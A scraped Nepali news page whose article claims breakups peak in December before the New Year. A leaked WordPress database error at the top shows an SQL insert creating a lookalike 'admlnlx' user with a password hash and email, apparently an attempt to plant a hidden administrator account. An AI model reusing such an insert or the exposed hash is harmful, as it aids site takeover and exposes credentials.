WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQBokXlo/XxuLPeFNSZcCp.w3/SF1q/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 05:40:59', '', 'admlnlx', 'admlnlx')
एजेन्सी । वर्षको अन्तिममा ब्रेकअपकाे खबर धेरै नै सुन्ने गरिन्छ । मनोवैज्ञानिका अनुसार नेपाल तथा दक्षिण एसियाली देशका मानिसहरुमा पश्चिमा संस्कृतिले अलि बढी नै प्रभाव पारेको छ ।
यसैकारण पश्चिमी देशहरुमा जस्तै नयाँ वर्ष नेपालमा पनि धुमधामका साथ मनाउने चलन छ । सामान्यतया पश्चिमी देशहरुमा जनवरी १ तारिखका दिनबाट नयाँ साल प्रारम्भ हुने गर्छ । यसैकारण मानिसहरु नयाँ वर्ष अर्थात डिसेम्बर अगावै आफ्नो सम्बन्धलाई किनारा लगाउँछन् ताकि उसको नयाँ वर्ष नबिग्रयोस् ।
यदि प्रेम जुन हिसाबले चल्नुपर्ने थियो, त्यो अनुरुप नभएमा पनि मानिसहरु अर्को वर्ष पनि पुरानो पिडा खेपेर सम्बन्धमा बस्न चाहदैनन् । डिसेम्बरमा ब्रेकअप गरेपछि मानिसहरु चाँडै नै यथावत अवस्थामा अाइपुग्छन् । मतलव ब्रेकअपले खासै असर गर्दैन । डेटिङ वेभसाइटका अनुसार पुरानो सम्बन्धबाट टाढा हुनेबितिक्कै अर्को नयाँ मानिसको चाहना हुने हुँदा धेरैजसो पुन जनवरीमा नयाँ मानिसको अागमन चाहन्छन् ।